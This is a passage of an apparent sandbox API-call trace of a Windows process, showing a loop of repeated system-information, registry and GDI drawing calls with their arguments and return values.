dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.073] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.073] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.073] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.073] BeginPath (hdc=0x0) returned 0 [0088.073] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.073] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.073] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.073] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.073] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.073] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.073] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.073] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.073] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x310401d0 [0088.073] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x330401cd [0088.073] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0d [0088.073] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0e [0088.073] CombineRgn (hrgnDst=0x1040e0d, hrgnSrc1=0x310401d0, hrgnSrc2=0x330401cd, iMode=1) returned 1 [0088.073] CombineRgn (hrgnDst=0x1040e0e, hrgnSrc1=0x310401d0, hrgnSrc2=0x330401cd, iMode=4) returned 2 [0088.073] CreateSolidBrush (color=0xff) returned 0x2100e0c [0088.073] CreateSolidBrush (color=0xff0000) returned 0x1100e0f [0088.073] DeleteObject (ho=0x1100e0f) returned 1 [0088.073] DeleteObject (ho=0x330401cd) returned 1 [0088.073] DeleteObject (ho=0x310401d0) returned 1 [0088.073] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.073] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.073] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.074] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.074] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.074] BeginPath (hdc=0x0) returned 0 [0088.074] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.074] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.074] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.074] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.074] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.074] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.074] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.074] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.074] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x340401cd [0088.074] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x320401d0 [0088.074] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e10 [0088.074] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e11 [0088.074] CombineRgn (hrgnDst=0x1040e10, hrgnSrc1=0x340401cd, hrgnSrc2=0x320401d0, iMode=1) returned 1 [0088.074] CombineRgn (hrgnDst=0x1040e11, hrgnSrc1=0x340401cd, hrgnSrc2=0x320401d0, iMode=4) returned 2 [0088.074] CreateSolidBrush (color=0xff) returned 0x2100e0f [0088.074] CreateSolidBrush (color=0xff0000) returned 0x1100e12 [0088.074] DeleteObject (ho=0x1100e12) returned 1 [0088.074] DeleteObject (ho=0x320401d0) returned 1 [0088.074] DeleteObject (ho=0x340401cd) returned 1 [0088.074] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.074] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.074] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.074] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.074] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.074] BeginPath (hdc=0x0) returned 0 [0088.074] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.074] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.074] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.074] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.074] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.074] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.074] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.074] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.075] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x330401d0 [0088.075] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x350401cd [0088.075] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e13 [0088.075] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e14 [0088.075] CombineRgn (hrgnDst=0x1040e13, hrgnSrc1=0x330401d0, hrgnSrc2=0x350401cd, iMode=1) returned 1 [0088.075] CombineRgn (hrgnDst=0x1040e14, hrgnSrc1=0x330401d0, hrgnSrc2=0x350401cd, iMode=4) returned 2 [0088.075] CreateSolidBrush (color=0xff) returned 0x2100e12 [0088.075] CreateSolidBrush (color=0xff0000) returned 0x1100e15 [0088.075] DeleteObject (ho=0x1100e15) returned 1 [0088.075] DeleteObject (ho=0x350401cd) returned 1 [0088.075] DeleteObject (ho=0x330401d0) returned 1 [0088.075] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.075] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.075] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.075] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.075] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.075] BeginPath (hdc=0x0) returned 0 [0088.075] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.075] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.075] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.075] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.075] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.075] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.075] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.075] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x360401cd [0088.075] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x340401d0 [0088.075] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e16 [0088.075] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e17 [0088.075] CombineRgn (hrgnDst=0x1040e16, hrgnSrc1=0x360401cd, hrgnSrc2=0x340401d0, iMode=1) returned 1 [0088.076] CombineRgn (hrgnDst=0x1040e17, hrgnSrc1=0x360401cd, hrgnSrc2=0x340401d0, iMode=4) returned 2 [0088.076] CreateSolidBrush (color=0xff) returned 0x2100e15 [0088.076] CreateSolidBrush (color=0xff0000) returned 0x1100e18 [0088.076] DeleteObject (ho=0x1100e18) returned 1 [0088.076] DeleteObject (ho=0x340401d0) returned 1 [0088.076] DeleteObject (ho=0x360401cd) returned 1 [0088.076] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.076] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.076] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.076] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.076] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.076] BeginPath (hdc=0x0) returned 0 [0088.076] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.076] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.076] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.076] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.076] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.076] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.076] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.076] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x350401d0 [0088.076] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x370401cd [0088.076] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e19 [0088.076] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1a [0088.076] CombineRgn (hrgnDst=0x1040e19, hrgnSrc1=0x350401d0, hrgnSrc2=0x370401cd, iMode=1) returned 1 [0088.076] CombineRgn (hrgnDst=0x1040e1a, hrgnSrc1=0x350401d0, hrgnSrc2=0x370401cd, iMode=4) returned 2 [0088.076] CreateSolidBrush (color=0xff) returned 0x2100e18 [0088.076] CreateSolidBrush (color=0xff0000) returned 0x1100e1b [0088.076] DeleteObject (ho=0x1100e1b) returned 1 [0088.076] DeleteObject (ho=0x370401cd) returned 1 [0088.076] DeleteObject (ho=0x350401d0) returned 1 [0088.076] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.076] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.076] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.076] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.076] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.077] BeginPath (hdc=0x0) returned 0 [0088.077] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.077] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.077] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.077] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.077] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.077] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.077] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.077] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.077] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x380401cd [0088.077] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x360401d0 [0088.077] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1c [0088.077] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1d [0088.077] CombineRgn (hrgnDst=0x1040e1c, hrgnSrc1=0x380401cd, hrgnSrc2=0x360401d0, iMode=1) returned 1 [0088.077] CombineRgn (hrgnDst=0x1040e1d, hrgnSrc1=0x380401cd, hrgnSrc2=0x360401d0, iMode=4) returned 2 [0088.077] CreateSolidBrush (color=0xff) returned 0x2100e1b [0088.077] CreateSolidBrush (color=0xff0000) returned 0x1100e1e [0088.077] DeleteObject (ho=0x1100e1e) returned 1 [0088.077] DeleteObject (ho=0x360401d0) returned 1 [0088.077] DeleteObject (ho=0x380401cd) returned 1 [0088.077] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.077] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.077] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.077] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.077] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.077] BeginPath (hdc=0x0) returned 0 [0088.077] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.077] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.077] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.077] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.077] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.077] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.077] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.077] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.078] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x370401d0 [0088.078] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x390401cd [0088.078] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1f [0088.078] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e20 [0088.078] CombineRgn (hrgnDst=0x1040e1f, hrgnSrc1=0x370401d0, hrgnSrc2=0x390401cd, iMode=1) returned 1 [0088.078] CombineRgn (hrgnDst=0x1040e20, hrgnSrc1=0x370401d0, hrgnSrc2=0x390401cd, iMode=4) returned 2 [0088.078] CreateSolidBrush (color=0xff) returned 0x2100e1e [0088.078] CreateSolidBrush (color=0xff0000) returned 0x1100e21 [0088.078] DeleteObject (ho=0x1100e21) returned 1 [0088.078] DeleteObject (ho=0x390401cd) returned 1 [0088.078] DeleteObject (ho=0x370401d0) returned 1 [0088.078] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.078] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.078] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.078] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.078] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.078] BeginPath (hdc=0x0) returned 0 [0088.078] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.078] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.078] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.078] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.078] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.078] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.078] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.078] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.078] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a0401cd [0088.078] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x380401d0 [0088.078] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e22 [0088.078] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e23 [0088.078] CombineRgn (hrgnDst=0x1040e22, hrgnSrc1=0x3a0401cd, hrgnSrc2=0x380401d0, iMode=1) returned 1 [0088.078] CombineRgn (hrgnDst=0x1040e23, hrgnSrc1=0x3a0401cd, hrgnSrc2=0x380401d0, iMode=4) returned 2 [0088.078] CreateSolidBrush (color=0xff) returned 0x2100e21 [0088.078] CreateSolidBrush (color=0xff0000) returned 0x1100e24 [0088.078] DeleteObject (ho=0x1100e24) returned 1 [0088.078] DeleteObject (ho=0x380401d0) returned 1 [0088.078] DeleteObject (ho=0x3a0401cd) returned 1 [0088.079] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.079] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.079] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.079] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.079] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.079] BeginPath (hdc=0x0) returned 0 [0088.079] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.079] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.079] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.079] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.079] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.079] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.079] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.079] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x390401d0 [0088.079] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b0401cd [0088.079] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e25 [0088.079] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e26 [0088.079] CombineRgn (hrgnDst=0x1040e25, hrgnSrc1=0x390401d0, hrgnSrc2=0x3b0401cd, iMode=1) returned 1 [0088.079] CombineRgn (hrgnDst=0x1040e26, hrgnSrc1=0x390401d0, hrgnSrc2=0x3b0401cd, iMode=4) returned 2 [0088.079] CreateSolidBrush (color=0xff) returned 0x2100e24 [0088.079] CreateSolidBrush (color=0xff0000) returned 0x1100e27 [0088.079] DeleteObject (ho=0x1100e27) returned 1 [0088.079] DeleteObject (ho=0x3b0401cd) returned 1 [0088.079] DeleteObject (ho=0x390401d0) returned 1 [0088.079] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.079] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.079] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.079] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.079] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.079] BeginPath (hdc=0x0) returned 0 [0088.079] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.079] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.079] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.079] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.080] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.080] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.080] RtlUnwind 